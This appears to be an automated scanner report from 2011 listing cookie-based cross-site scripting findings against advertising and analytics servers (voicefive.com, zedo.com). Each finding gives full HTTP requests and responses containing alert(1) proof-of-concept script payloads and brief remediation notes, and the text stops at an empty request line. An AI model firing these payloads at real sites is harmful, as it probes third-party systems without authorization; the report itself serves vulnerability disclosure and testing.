HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:39 GMT Connection: close Content-Length: 7274
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... ="Javascript">CollectiveMedia.createAndAttachAd("uol-44220574_1296266079","http://ad.doubleclick.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109;net=uol;u=,uol-44220574_1296266079,11d765b6a10b1b3e5bd7';alert(1)//464e19fd8c7,ent,;;dcove=o;sz=300x250;net=uol;env=ifr;ord1=605483;contx=ent;dc=w;btg=;ord=1655200?","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 94aba<script>alert(1)</script>18a5cd25845 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=194aba<script>alert(1)</script>18a5cd25845; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 16:37:23 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:23 2011&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:23 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26393
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401740",Location:CO ...[SNIP]... recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&', "BMX_3PC": '194aba<script>alert(1)</script>18a5cd25845', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|h ...[SNIP]...
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 98d98<script>alert(1)</script>11107b5acab was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C98d98<script>alert(1)</script>11107b5acab
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 16:37:23 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:23 2011&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:23 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26393
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload ef153<script>alert(1)</script>1aed363857 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 27 13:24:45 2011&prad=58087454&arc=40401349&; UID=1d29d89e-72.246.30.75-1294456810ef153<script>alert(1)</script>1aed363857
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 16:37:23 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:23 2011&prad=58087481&arc=40401349&; expires=Thu 28-Apr-2011 16:37:23 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296232643; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26297
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401349",Location:CO ...[SNIP]... ); }else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810ef153<script>alert(1)</script>1aed363857', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 2 ...[SNIP]...
The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 4c0e5<script>alert(1)</script>8e340961025 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p45555483&PRAd=59007464&AR_C=38601779\ HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296264969%2E946%2Cwait%2D%3E10000%2C; UID=1d29d89e-72.246.30.75-1294456810; ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&4c0e5<script>alert(1)</script>8e340961025; ar_p85001580=exp=23&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 01:36:09 2011&prad=58087449&arc=40400793&;
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 29 Jan 2011 05:21:01 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: ar_p45555483=exp=2&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 05:21:01 2011&4c0e5<script>alert(1)</script>8e340961025=&prad=59007464&arc=38601779%5C&; expires=Fri 29-Apr-2011 05:21:01 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 27721
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"59007464",Pid:"p45555483",Arc:"38601779\",Location:C ...[SNIP]... : '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296264969%2E946%2Cwait%2D%3E10000%2C', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&4c0e5<script>alert(1)</script>8e340961025', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.co ...[SNIP]...
The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 19ab0<script>alert(1)</script>eb1af63e5fc was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&19ab0<script>alert(1)</script>eb1af63e5fc; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 16:37:22 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:22 2011&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:22 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26393
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401740",Location:CO ...[SNIP]... ();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&19ab0<script>alert(1)</script>eb1af63e5fc', "ar_p85001580": 'exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait% ...[SNIP]...
The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 23425<script>alert(1)</script>3fbe48c0625 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&23425<script>alert(1)</script>3fbe48c0625; ar_p85001580=exp=14&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 00:14:19 2011&prad=58087454&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296260059%2E936%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 29 Jan 2011 01:56:36 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=15&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 01:56:36 2011&prad=58087449&arc=39969205&; expires=Fri 29-Apr-2011 01:56:36 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26513
The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload be4b9<script>alert(1)</script>72311a1bd07 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&be4b9<script>alert(1)</script>72311a1bd07; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 16:37:22 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:22 2011&be4b9<script>alert(1)</script>72311a1bd07=&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:22 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26393
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401740",Location:CO ...[SNIP]... 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&be4b9<script>alert(1)</script>72311a1bd07', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.co ...[SNIP]...
The value of the FFpb cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1aa4b(a)1243ae578bf was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'1aa4b(a)1243ae578bf; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1016 Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791'1aa4b(a)1243ae578bf;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=252 Expires: Fri, 28 Jan 2011 17:30:57 GMT Date: Fri, 28 Jan 2011 17:26:45 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='None,4f791'1aa4b(a)1243ae578bf';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=None,4f791'1aa4b(a)1243ae578bf;z="+Math.random();}
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b470"-alert(1)-"e08a3e6143 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
